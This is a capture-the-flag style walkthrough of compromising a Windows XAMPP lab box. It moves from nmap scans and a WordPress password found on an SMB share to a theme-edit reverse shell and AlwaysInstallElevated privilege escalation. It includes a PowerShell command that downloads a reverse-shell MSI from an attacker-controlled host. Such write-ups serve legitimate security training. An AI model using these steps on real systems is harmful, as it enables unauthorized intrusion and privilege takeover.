1.Reconnaissance

Let’s begin the initial nmap enumeration

┌──(kali㉿kali)-[/home/Tools/nmapAutomator/192.168.179.55]

./nmapAutomator.sh 192.168.179.55 all

Running all scans on 192.168.179.55

Host is likely running Unknown OS!

———————Starting Port Scan———————–

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.179.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.179.55/dashboard/
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host ‘192.168.45.160’ is not allowed to connect to this MariaDB server
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2023-10-03T02:14:47
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: -1s

OS Detection modified to: Windows

———————Starting Full Scan————————

PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown

Making a script scan on extra ports: 5040, 7680, 49664, 49665, 49666, 49667, 49668, 49669

PORT STATE SERVICE VERSION
5040/tcp open unknown
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

———————-Starting UDP Scan————————

No UDP ports are open

2.Enumeration

Next,let’s Enumerate the SMB Service

We can see a drive call ” Shenzi”,let’s checking out its contents

The password.txt contains some userful and sensitive infomation

### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

User: root
Password:
(means no password!)

2) FileZilla FTP:

[ You have to create a new user on the FileZilla Interface ]

3) Mercury (not in the USB & lite version):

Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)

User: newuser
Password: wampp

4) WEBDAV:

User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf

LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so

Please do not forget to refresh the WEBDAV authentification (users and passwords).

5) WordPress:

User: admin
Password: FeltHeadwallWight357

I tried to use feroxbuster to find some useful directory,but it’s userless and nothing.

But we can use collected Credentials to as access “http://192.168.179.55/shenzi”,then find a webpage

And Next,we access to  /wp-admin/ by using “FeltHeadwallWight357” Creds

3.Foothold

We can edit the theme here,because this is a nmap box ,then create a reverse shell by using msfvenom

Modifying the wordpress php script

Next,let’s  mofifying the code  and trigger the payload.

4.Privilege Escalation

Nice,445 successfully receive a reverse shell

Then,got a foothold of targeted machine,then Running winpeas.exe to enumerate further.

found  AlwayInstallElevated set to 1 for current user.

(New-Object System.Net.WebClient).DownloadFile(“http://192.168.45.230/reverse.msi", “C:\Users\shenzi\Desktop\reverse.msi”)

Above picture means that allow us to run any .msi file with system privilege.We can create another reverse shell payload with msfvenom as .msi file.

Refer:https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

Finally,got a reverse shell,Nice,it’s admi permission !